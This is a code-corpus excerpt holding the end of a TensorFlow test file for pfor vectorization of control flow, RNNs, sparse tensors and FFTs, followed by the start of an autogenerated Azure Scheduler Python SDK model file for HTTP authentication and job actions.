# TODO(agarwal): one optimization that dynamic_rnn uses is to avoid the
# array_ops.where when t < min(sequence_length). Doing that requires
# supporting tf.cond pfor conversion.
done = t >= sequence_length_i
output = array_ops.where(done, zeros, output)
ta = ta.write(t, output)
new_state = [
array_ops.where(done, s, ns)
for s, ns in zip(nest.flatten(state), nest.flatten(new_state))
]
new_state = nest.pack_sequence_as(state, new_state)
return t + 1, new_state, ta
def condition_fn(t, _, unused):
del unused
return t < max_steps
initial_state = cell.zero_state(1, dtypes.float32)
_, state, ta = control_flow_ops.while_loop(condition_fn, body_fn, [
0, initial_state,
tensor_array_ops.TensorArray(dtypes.float32, max_steps)
])
new_state = [array_ops.reshape(x, [-1]) for x in nest.flatten(state)]
new_state = nest.pack_sequence_as(initial_state, new_state)
return ta.stack(), new_state
pfor_output = pfor_control_flow_ops.pfor(loop_fn, batch_size)
tf_output = rnn.dynamic_rnn(
cell,
inputs,
sequence_length=sequence_length,
initial_state=cell.zero_state(batch_size, dtypes.float32))
return pfor_output, tf_output
@test_util.run_all_in_graph_and_eager_modes
class WhileV2Test(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
super(WhileV2Test, self).setUp()
def tearDown(self):
if not self._enabled:
control_flow_v2_toggles.disable_control_flow_v2()
super(WhileV2Test, self).tearDown()
def test_while_outside_loop(self):
def _f():
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
def loop_fn(i):
return _f() + i
self._test_loop_fn(loop_fn, 3)
def test_invariant_while(self):
def loop_fn(_):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1, [0])
self._test_loop_fn(loop_fn, 3)
def test_invariant_while_with_control_dependency(self):
def loop_fn(i):
with ops.control_dependencies([i]):
return control_flow_ops.while_loop(lambda j: j < 4, lambda j: j + 1,
[0])
self._test_loop_fn(loop_fn, 3)
def test_while_with_stateful_ops(self):
def loop_fn(_):
j, _ = control_flow_ops.while_loop(
lambda j, x: j < 4, lambda j, x:
(j + 1, x + random_ops.random_uniform([])), [0, 0.])
return j
self._test_loop_fn(loop_fn, 3)
def test_while_with_variable(self):
v = resource_variable_ops.ResourceVariable(5.)
def loop_fn(_):
_, output = control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + v), [0, 0.])
return output
self._test_loop_fn(loop_fn, 3)
def test_while_unstacked_condition(self):
def loop_fn(i):
return control_flow_ops.while_loop(lambda j, x: j < 4, lambda j, x:
(j + 1, x + i), [0, 0])
self._test_loop_fn(loop_fn, 3)
def test_while(self):
x = random_ops.random_uniform([3, 5])
lengths = constant_op.constant([4, 0, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
lengths_i = array_ops.gather(lengths, i)
return control_flow_ops.while_loop(
lambda j, _: j < lengths_i, lambda j, t:
(j + 1, t + array_ops.gather(x_i, j)), [0, 0.])
self._test_loop_fn(loop_fn, 3)
def test_while_change_input_invariance(self):
# This tests cases where a loop invariant input to while has loop dependent
# operations applied to it inside the while body.
    # It also tests inputs that are passed through.
def loop_fn(i):
return control_flow_ops.while_loop(
lambda j, *_: j < i, lambda j, x, y, z, w:
(j + 1, x + i, y + x, z, w), [
0,
constant_op.constant(0),
constant_op.constant(1), i,
constant_op.constant(2)
])
self._test_loop_fn(loop_fn, 3)
def test_while_shape_invariants(self):
def loop_fn(i):
return control_flow_ops.while_loop(
lambda j, *_: j < 4,
lambda j, x, y: (j + 1, x + i, y + 1),
[0, constant_op.constant([0, 1]),
constant_op.constant([2, 3])],
shape_invariants=[
None,
tensor_shape.TensorShape([2]),
tensor_shape.TensorShape([2])
])
self._test_loop_fn(loop_fn, 3)
def test_while_jacobian(self):
# Note that we wrap the code below in a tf.function since we don't want the
# while_loop call to be evaluated eagerly using a python loop.
@def_function.function
def _f(x, y, use_pfor):
# out = x @ y @ y @ y @ y, where @ is matmul operator.
_, out = control_flow_ops.while_loop(
lambda i, _: i < 4, lambda i, out: (i + 1, math_ops.matmul(out, y)),
[0, x])
def loop_fn(i):
out_i = array_ops.gather(out, i, axis=1)
grad = gradient_ops.gradients(out_i, x)
return array_ops.reshape(grad[0], [-1])
if use_pfor:
return pfor_control_flow_ops.pfor(loop_fn, iters=3)
else:
return pfor_control_flow_ops.for_loop(
loop_fn, iters=3, loop_fn_dtypes=out.dtype)
x = constant_op.constant(np.random.uniform(size=(1, 3)))
y = constant_op.constant(np.random.uniform(size=(3, 3)))
self.assertAllClose(_f(x, y, True), _f(x, y, False))
def test_scan(self):
np.random.seed(seed=42)
data = np.random.randn(3).astype(np.float32)
def log_prob(x):
return math_ops.reduce_sum(functional_ops.scan_v2(
lambda _, yi: (x - yi)**2,
elems=data,
initializer=constant_op.constant(0.)))
x = variables.Variable(array_ops.ones([2]))
self.evaluate(x.initializer)
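    # compute_gradient returns the theoretical and numeric Jacobians of
    # v_log_prob at x; the two should agree if the vectorization is correct.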
v_log_prob = lambda x: pfor_control_flow_ops.vectorized_map(log_prob, x)
theoretical, numerical = gradient_checker_v2.compute_gradient(
v_log_prob, (x,), delta=1e-3)
self.assertAllClose(theoretical, numerical, rtol=1e-2)
@test_util.run_all_in_graph_and_eager_modes
class NestedControlFlowTest(PForTestCase):
def setUp(self):
self._enabled = control_flow_v2_toggles.control_flow_v2_enabled()
control_flow_v2_toggles.enable_control_flow_v2()
super(NestedControlFlowTest, self).setUp()
def tearDown(self):
if not self._enabled:
control_flow_v2_toggles.disable_control_flow_v2()
super(NestedControlFlowTest, self).tearDown()
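  # _cond and _while wrap a function in a tf.cond / tf.while_loop respectively;
  # composing them (e.g. self._cond(self._while())) builds the nested control
  # flow exercised by the tests below.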
def _cond(self, f=None, split=0):
if f is None:
f = lambda x, y: (x, y)
def _f(x, y):
return control_flow_ops.cond(y > split, lambda: f(x, y), lambda:
(x + 1., y))
return _f
def _while(self, f=None):
if f is None:
f = lambda x, y: (x, y)
def _f(x, y):
return control_flow_ops.while_loop(
lambda j, _: j < y, lambda j, t:
(j + 1, t + array_ops.gather(f(x, y)[0], j)), [0, x])[1], y
return _f
def _test_helper(self, f):
x = random_ops.random_uniform([5, 5])
y = constant_op.constant([4, -1, 2, -2, 2])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
return f(x_i, y_i)
self._test_loop_fn(loop_fn, 5)
def test_cond_while(self):
self._test_helper(self._cond(self._while()))
def test_while_cond(self):
self._test_helper(self._while(self._cond()))
def test_while_while(self):
self._test_helper(self._while(self._while()))
def test_cond_cond(self):
self._test_helper(self._cond(self._cond()))
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class StatelessIfTest(PForTestCase):
def test_loop_variant_cond(self):
x = [1, 2, 3, 4, 5.]
y = 2.5
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
# Note that the output has a combination of then and else branches being
# loop variant / invariant.
return cond_v2.cond_v2(x_i < y, lambda: (y - x_i, y, 1., 2.), lambda:
(x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
def test_loop_invariant_cond(self):
x = [1, 2, 3, 4, 5.]
y = 0.5
z = random_ops.random_uniform([])
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
# Note that the output has a combination of then and else branches being
# loop variant / invariant.
return cond_v2.cond_v2(z < y, lambda: (y - x_i, y, 1., 2.), lambda:
(x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
def test_empty_branch(self):
x = [1, 2, 3, 4, 5.]
y = 6.
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
return cond_v2.cond_v2(
x_i < y, # Note that else branch is empty.
lambda: (y - x_i, y, 1., 2.),
lambda: (x_i - y, 0., y, 3.))
self._test_loop_fn(loop_fn, iters=5)
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class IfTest(PForTestCase):
def test_read_var(self):
self.skipTest("b/156438918") # Flaky
x = [1, 2, 3, 4, 5.]
y = 2.5
z = resource_variable_ops.ResourceVariable(5.)
@def_function.function
def loop_fn(i):
x_i = array_ops.gather(x, i)
return cond_v2.cond_v2(x_i < y, lambda: z - x_i, lambda: z + x_i)
self._test_loop_fn(loop_fn, iters=5)
class RNNTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_dynamic_rnn(self):
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicRNNCell, 3, 5,
7)
self.run_and_assert_equal(pfor_outputs, tf_outputs)
@test_util.run_v1_only("b/122612051")
def test_dynamic_lstm(self):
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicLSTMCell, 3, 5,
7)
self.run_and_assert_equal(pfor_outputs, tf_outputs)
# TODO(agarwal): benchmark numbers on GPU for graphs based on while_loop
# conversion don't look good. Some of it seems like a lot of copies between
# host and device. Optimize that.
class Benchmarks(test.Benchmark):
def _run(self, targets, iters, name=None):
def _done(t):
# Note that we don't use tf.control_dependencies since that will not make
# sure that the computation on GPU has actually finished. So we fetch the
# first element of the output, and assume that this will not be called on
# empty tensors.
return array_ops.gather(array_ops.reshape(t, [-1]), 0)
targets = [_done(x) for x in nest.flatten(targets)]
sess = session.Session()
with sess:
init = variables.global_variables_initializer()
sess.run(init)
run_fn = sess.make_callable(targets)
run_fn() # Warm up
begin = time.time()
for _ in range(iters):
run_fn()
end = time.time()
avg_time_ms = 1000 * (end - begin) / iters
self.report_benchmark(iters=iters, wall_time=avg_time_ms, name=name)
return avg_time_ms
def benchmark_sess_run_overhead(self):
with ops.Graph().as_default():
x = constant_op.constant(1.0)
self._run(x, 10000, name="session_run_overhead")
def benchmark_add(self):
with ops.Graph().as_default():
n = 256
params = 1000
x = random_ops.random_normal([n, params])
y = random_ops.random_normal([n, params])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
return x_i + y_i
pfor_outputs = pfor_control_flow_ops.pfor(loop_fn, n)
while_outputs = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, n)
manual = x + y
self._run(manual, 1000, name="manual_add")
self._run(pfor_outputs, 1000, name="pfor_add")
self._run(while_outputs, 100, name="while_add")
def benchmark_matmul(self):
with ops.Graph().as_default():
n = 1024
params = 1000
x = random_ops.random_normal([n, params])
y = random_ops.random_normal([params, params])
def loop_fn(i):
x_i = array_ops.expand_dims(array_ops.gather(x, i), 0)
return math_ops.matmul(x_i, y)
pfor_outputs = pfor_control_flow_ops.pfor(loop_fn, n)
while_outputs = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, n)
manual = math_ops.matmul(x, y)
self._run(manual, 1000, name="manual_matmul")
self._run(pfor_outputs, 1000, name="pfor_matmul")
self._run(while_outputs, 100, name="while_matmul")
def benchmark_map_fn(self):
with ops.Graph().as_default():
b = 256
params = 1000
inp = random_ops.random_normal((b, params))
fn = lambda x: x * x
def pfor_map_fn(f, x):
return pfor_control_flow_ops.pfor(lambda i: f(array_ops.gather(x, i)),
array_ops.shape(x)[0])
map_output = map_fn.map_fn(fn, inp)
pfor_output = pfor_map_fn(fn, inp)
self._run(map_output, 100, name="tf_map_fn")
self._run(pfor_output, 100, name="pfor_map_fn")
def benchmark_basic_while(self):
with ops.Graph().as_default():
def loop_fn(i):
_, s = control_flow_ops.while_loop(lambda t, x: t < i, lambda t, x:
(t + 1, x + i), [0, 0])
return s
iters = 50
pfor_output = pfor_control_flow_ops.pfor(loop_fn, iters)
for_loop_output = pfor_control_flow_ops.for_loop(loop_fn, dtypes.int32,
iters)
self._run(pfor_output, 100, name="pfor_basic")
self._run(for_loop_output, 100, name="for_loop_basic")
def benchmark_dynamic_rnn(self):
with ops.Graph().as_default():
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicRNNCell, 128,
512, 16)
self._run(pfor_outputs, 100, name="pfor_rnn")
self._run(tf_outputs, 100, name="tf_rnn")
def benchmark_reduction(self):
n = 1024
with ops.Graph().as_default():
x = random_ops.random_uniform([n, n])
w = random_ops.random_uniform([n, n])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return math_ops.reduce_sum(
math_ops.matmul(pfor_config.reduce_concat(x_i), w))
# Note that output_reduction will be tiled, so there may be some minor
# overheads compared to output_no_reduction.
output_reduction = pfor_control_flow_ops.pfor(loop_fn, n)
output_no_reduction = math_ops.reduce_sum(math_ops.matmul(x, w))
# Benchmark to test that reduction does not add overhead and its output is
# treated as loop invariant.
self._run(output_reduction, 30, name="matmul_reduction")
self._run(output_no_reduction, 30, name="matmul_no_reduction")
class SparseTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_var_loop_len(self):
num_iters = array_ops.placeholder(dtypes.int32)
def loop_fn(_):
return sparse_tensor.SparseTensor([[0], [1], [2]], [4, 5, 6],
                                        [3])  # dense: [4, 5, 6]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
with self.cached_session() as sess:
sess.run(pfor, feed_dict={num_iters: 3})
@test_util.run_v1_only("b/122612051")
def test_sparse_result_none_stacked(self):
num_iters = 10
def loop_fn(_):
return sparse_tensor.SparseTensor([[0], [1], [2]], [4, 5, 6],
                                        [3])  # dense: [4, 5, 6]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
indices = [[i, j] for i in range(num_iters) for j in range(3)]
values = [4, 5, 6] * num_iters
dense_shapes = [num_iters, 3]
# Expected result: [[4, 5, 6], [4, 5, 6], [4, 5, 6], ...]
manual = sparse_tensor.SparseTensor(indices, values, dense_shapes)
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_all_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
indices = array_ops.expand_dims(i, 0)
return sparse_tensor.SparseTensor(indices, i, i + 1) # [0, ..., 0, i]
# Expected result: [[0], [0, 1], [0, 0, 2], [0, 0, 0, 3], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, i] for i in range(num_iters)],
list(range(num_iters)),
(num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_indices_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
indices = array_ops.expand_dims(i, 0)
return sparse_tensor.SparseTensor(indices, [1], [num_iters])
# Expected result: identity matrix size num_iters * num_iters
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, i] for i in range(num_iters)],
[1] * num_iters, (num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_values_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
return sparse_tensor.SparseTensor([[0]], i, [num_iters]) # [i, 0, ..., 0]
    # Expected result: [[0, 0, ...], [1, 0, ...], [2, 0, ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0] for i in range(num_iters)],
list(range(num_iters)),
(num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_shapes_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
return sparse_tensor.SparseTensor([[0]], [1], i + 1) # [1, 0, ..., 0]
# Expected result: [[1, 0, 0, ...], [1, 0, 0, ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0] for i in range(num_iters)],
[1] * num_iters, (num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_shapes_stacked_2D(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i + 1, dtypes.int64), 0)
shape = array_ops.concat([i, i], 0)
return sparse_tensor.SparseTensor([[0, 0]], [1], shape) # [1, 0, ..., 0]
# Expected result: [[[1, 0, ...], [0, ..., 0], [0, ..., 0], ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0, 0] for i in range(num_iters)],
[1] * num_iters,
(num_iters, num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
class ParsingTest(PForTestCase):
def test_decode_csv(self):
csv_tensor = constant_op.constant([["1:2:3"], ["::"], ["7:8:9"]])
kwargs = {"record_defaults": [[10], [20], [30]], "field_delim": ":"}
def loop_fn(i):
line = array_ops.gather(csv_tensor, i)
return parsing_ops.decode_csv(line, **kwargs)
self._test_loop_fn(loop_fn, iters=3)
@test_util.run_v1_only("b/122612051")
def test_parse_single_example(self):
def _int64_feature(*values):
return feature_pb2.Feature(int64_list=feature_pb2.Int64List(value=values))
def _bytes_feature(*values):
return feature_pb2.Feature(
bytes_list=feature_pb2.BytesList(
value=[v.encode("utf-8") for v in values]))
examples = constant_op.constant([
example_pb2.Example(
features=feature_pb2.Features(
feature={
"dense_int": _int64_feature(i),
"dense_str": _bytes_feature(str(i)),
"sparse_int": _int64_feature(i, i * 2, i * 4, i * 8),
"sparse_str": _bytes_feature(*["abc"] * i)
})).SerializeToString() for i in range(10)
])
features = {
"dense_int": parsing_ops.FixedLenFeature((), dtypes.int64, 0),
"dense_str": parsing_ops.FixedLenFeature((), dtypes.string, ""),
"sparse_int": parsing_ops.VarLenFeature(dtypes.int64),
"sparse_str": parsing_ops.VarLenFeature(dtypes.string),
}
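    # Parsing one example per pfor iteration should match a single
    # parse_example call over the whole batch of serialized protos.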
def loop_fn(i):
example_proto = array_ops.gather(examples, i)
f = parsing_ops.parse_single_example(example_proto, features)
return f
pfor = pfor_control_flow_ops.pfor(loop_fn, iters=10)
manual = parsing_ops.parse_example(examples, features)
self.run_and_assert_equal(pfor, manual)
class PartitionedCallTest(PForTestCase):
def test_simple(self):
@def_function.function
def f(x):
return math_ops.square(x) + 1
z = random_ops.random_uniform([4])
def loop_fn(i):
return f(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_nested_calls(self):
@def_function.function
def inner(x):
return math_ops.square(x)
@def_function.function
def outer(y):
return math_ops.reduce_sum(inner(y)) + 2
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
return outer(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_nested_definition(self):
@def_function.function
def outer(y):
@def_function.function
def inner(x):
return math_ops.square(x) + 1
return math_ops.reduce_sum(inner(y)) + 2
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
return outer(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_gradients(self):
@def_function.function
def f(x):
return math_ops.square(x) + 1
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
z_i = array_ops.gather(z, i)
with backprop.GradientTape() as g:
g.watch(z_i)
out = f(z_i)
return out, g.gradient(out, z_i)
self._test_loop_fn(loop_fn, 4)
def test_stateful_with_gradients(self):
z = random_ops.random_uniform([4, 2])
v = variables.Variable(z[0])
@def_function.function
def f(x):
return math_ops.square(x) + v + 1
def loop_fn(i):
z_i = array_ops.gather(z, i)
with backprop.GradientTape() as g:
g.watch(z_i)
out = f(z_i)
return out, g.gradient(out, z_i)
self._test_loop_fn(loop_fn, 4)
class SpectralTest(PForTestCase, parameterized.TestCase):
@parameterized.parameters(
(fft_ops.fft,),
(fft_ops.fft2d,),
(fft_ops.fft3d,),
(fft_ops.ifft,),
(fft_ops.ifft2d,),
(fft_ops.ifft3d,),
)
def test_fft(self, op_func):
shape = [2, 3, 4, 3, 4]
x = np.random.uniform(size=shape) + 1j * np.random.uniform(size=shape)
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(fft_ops.rfft,),
(fft_ops.rfft2d,),
(fft_ops.rfft3d,),
)
def test_rfft(self, op_func):
for dtype in (dtypes.float32, dtypes.float64):
x = random_ops.random_uniform([2, 3, 4, 3, 4], dtype=dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(fft_ops.irfft,),
(fft_ops.irfft2d,),
(fft_ops.irfft3d,),
)
def test_irfft(self, op_func):
if config.list_physical_devices("GPU"):
# TODO(b/149957923): The test is flaky
self.skipTest("b/149957923: irfft vectorization flaky")
for dtype in (dtypes.complex64, dtypes.complex128):
shape = [2, 3, 4, 3, 4]
x = np.random.uniform(size=shape) + 1j * np.random.uniform(size=shape)
x = math_ops.cast(x, dtype=dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
class VariableTest(PForTestCase):
def test_create_variable_once(self):
x = array_ops.ones(shape=(3, 2, 2), dtype=dtypes.float32)
y = array_ops.ones(shape=(2, 3), dtype=dtypes.float32)
a_var = []
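    # The list acts as a create-once cache: the variable is created only on
    # the first call to f. Repeated creation inside vectorized_map is not
    # allowed under v2 behavior (see the next test).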
def f(z):
if not a_var:
a_var.append(variables.Variable(lambda: y, name="a"))
return math_ops.matmul(z, a_var[0] / 16)
pfor_control_flow_ops.vectorized_map(f, x)
@test_util.run_v2_only
def test_create_variable_repeated(self):
x = array_ops.ones(shape=(3, 2, 2), dtype=dtypes.float32)
y = array_ops.ones(shape=(2, 3), dtype=dtypes.float32)
def f(z):
a_var = variables.Variable(lambda: y, name="a") / 4
return math_ops.matmul(z, a_var / 16)
# Note that this error is only raised under v2 behavior.
with self.assertRaisesRegex(
ValueError,
"tf.function-decorated function tried to create variables on non-first"
):
pfor_control_flow_ops.vectorized_map(f, x)
@test_util.run_all_in_graph_and_eager_modes
def test_variable_shape(self):
v = resource_variable_ops.ResourceVariable([1, 2])
def loop_fn(_):
return resource_variable_ops.variable_shape(v.handle)
self._test_loop_fn(loop_fn, 2)
if __name__ == "__main__":
test.main()
| karllessard/tensorflow | tensorflow/python/ops/parallel_for/control_flow_ops_test.py | Python | apache-2.0 | 74,341 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class HttpAuthentication(msrest.serialization.Model):
"""HttpAuthentication.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: OAuthAuthentication, BasicAuthentication, ClientCertAuthentication.
All required parameters must be populated in order to send to Azure.
    :param type: Required. Gets or sets the HTTP authentication type. Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
}
_subtype_map = {
'type': {'ActiveDirectoryOAuth': 'OAuthAuthentication', 'Basic': 'BasicAuthentication', 'ClientCertificate': 'ClientCertAuthentication'}
}
def __init__(
self,
**kwargs
):
super(HttpAuthentication, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class BasicAuthentication(HttpAuthentication):
"""BasicAuthentication.
All required parameters must be populated in order to send to Azure.
    :param type: Required. Gets or sets the HTTP authentication type. Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param username: Gets or sets the username.
:type username: str
:param password: Gets or sets the password, return value will always be empty.
:type password: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(BasicAuthentication, self).__init__(**kwargs)
self.type = 'Basic' # type: str
self.username = kwargs.get('username', None)
self.password = kwargs.get('password', None)
class ClientCertAuthentication(HttpAuthentication):
"""ClientCertAuthentication.
All required parameters must be populated in order to send to Azure.
    :param type: Required. Gets or sets the HTTP authentication type. Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param password: Gets or sets the certificate password, return value will always be empty.
:type password: str
    :param pfx: Gets or sets the pfx certificate. Accepts the certificate in base64 encoding, return
value will always be empty.
:type pfx: str
:param certificate_thumbprint: Gets or sets the certificate thumbprint.
:type certificate_thumbprint: str
:param certificate_expiration_date: Gets or sets the certificate expiration date.
:type certificate_expiration_date: ~datetime.datetime
:param certificate_subject_name: Gets or sets the certificate subject name.
:type certificate_subject_name: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
'pfx': {'key': 'pfx', 'type': 'str'},
'certificate_thumbprint': {'key': 'certificateThumbprint', 'type': 'str'},
'certificate_expiration_date': {'key': 'certificateExpirationDate', 'type': 'iso-8601'},
'certificate_subject_name': {'key': 'certificateSubjectName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ClientCertAuthentication, self).__init__(**kwargs)
self.type = 'ClientCertificate' # type: str
self.password = kwargs.get('password', None)
self.pfx = kwargs.get('pfx', None)
self.certificate_thumbprint = kwargs.get('certificate_thumbprint', None)
self.certificate_expiration_date = kwargs.get('certificate_expiration_date', None)
self.certificate_subject_name = kwargs.get('certificate_subject_name', None)
class HttpRequest(msrest.serialization.Model):
"""HttpRequest.
:param authentication: Gets or sets the authentication method of the request.
:type authentication: ~azure.mgmt.scheduler.models.HttpAuthentication
:param uri: Gets or sets the URI of the request.
:type uri: str
:param method: Gets or sets the method of the request.
:type method: str
:param body: Gets or sets the request body.
:type body: str
:param headers: Gets or sets the headers.
:type headers: dict[str, str]
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'HttpAuthentication'},
'uri': {'key': 'uri', 'type': 'str'},
'method': {'key': 'method', 'type': 'str'},
'body': {'key': 'body', 'type': 'str'},
'headers': {'key': 'headers', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(HttpRequest, self).__init__(**kwargs)
self.authentication = kwargs.get('authentication', None)
self.uri = kwargs.get('uri', None)
self.method = kwargs.get('method', None)
self.body = kwargs.get('body', None)
self.headers = kwargs.get('headers', None)
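# Illustrative sketch (not part of the generated code): these are plain msrest
# models constructed through keyword arguments, so an HTTP action with basic
# authentication can be assembled as below. The URL and credentials are
# placeholder values, not anything taken from the original file.
def _example_http_request():
    return HttpRequest(
        authentication=BasicAuthentication(username='user', password='secret'),
        uri='https://example.invalid/endpoint',
        method='GET',
        headers={'x-ms-sample': 'true'},
    )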
class JobAction(msrest.serialization.Model):
"""JobAction.
:param type: Gets or sets the job action type. Possible values include: "Http", "Https",
"StorageQueue", "ServiceBusQueue", "ServiceBusTopic".
:type type: str or ~azure.mgmt.scheduler.models.JobActionType
:param request: Gets or sets the http requests.
:type request: ~azure.mgmt.scheduler.models.HttpRequest
:param queue_message: Gets or sets the storage queue message.
:type queue_message: ~azure.mgmt.scheduler.models.StorageQueueMessage
:param service_bus_queue_message: Gets or sets the service bus queue message.
:type service_bus_queue_message: ~azure.mgmt.scheduler.models.ServiceBusQueueMessage
:param service_bus_topic_message: Gets or sets the service bus topic message.
:type service_bus_topic_message: ~azure.mgmt.scheduler.models.ServiceBusTopicMessage
:param retry_policy: Gets or sets the retry policy.
:type retry_policy: ~azure.mgmt.scheduler.models.RetryPolicy
:param error_action: Gets or sets the error action.
:type error_action: ~azure.mgmt.scheduler.models.JobErrorAction
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'request': {'key': 'request', 'type': 'HttpRequest'},
'queue_message': {'key': 'queueMessage', 'type': 'StorageQueueMessage'},
'service_bus_queue_message': {'key': 'serviceBusQueueMessage', 'type': 'ServiceBusQueueMessage'},
'service_bus_topic_message': {'key': 'serviceBusTopicMessage', 'type': 'ServiceBusTopicMessage'},
'retry_policy': {'key': 'retryPolicy', 'type': 'RetryPolicy'},
'error_action': {'key': 'errorAction', 'type': 'JobErrorAction'},
}
def __init__(
self,
**kwargs
):
super(JobAction, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.request = kwargs.get('request', None)
self.queue_message = kwargs.get('queue_message', None)
self.service_bus_queue_message = kwargs.get('service_bus_queue_message', None)
self.service_bus_topic_message = kwargs.get('service_bus_topic_message', None)
self.retry_policy = kwargs.get('retry_policy', None)
self.error_action = kwargs.get('error_action', None)
class JobCollectionDefinition(msrest.serialization.Model):
"""JobCollectionDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job collection resource identifier.
:vartype id: str
:ivar type: Gets the job collection resource type.
:vartype type: str
:param name: Gets or sets the job collection resource name.
:type name: str
:param location: Gets or sets the storage account location.
:type location: str
:param tags: A set of tags. Gets or sets the tags.
:type tags: dict[str, str]
:param properties: Gets or sets the job collection properties.
:type properties: ~azure.mgmt.scheduler.models.JobCollectionProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'JobCollectionProperties'},
}
def __init__(
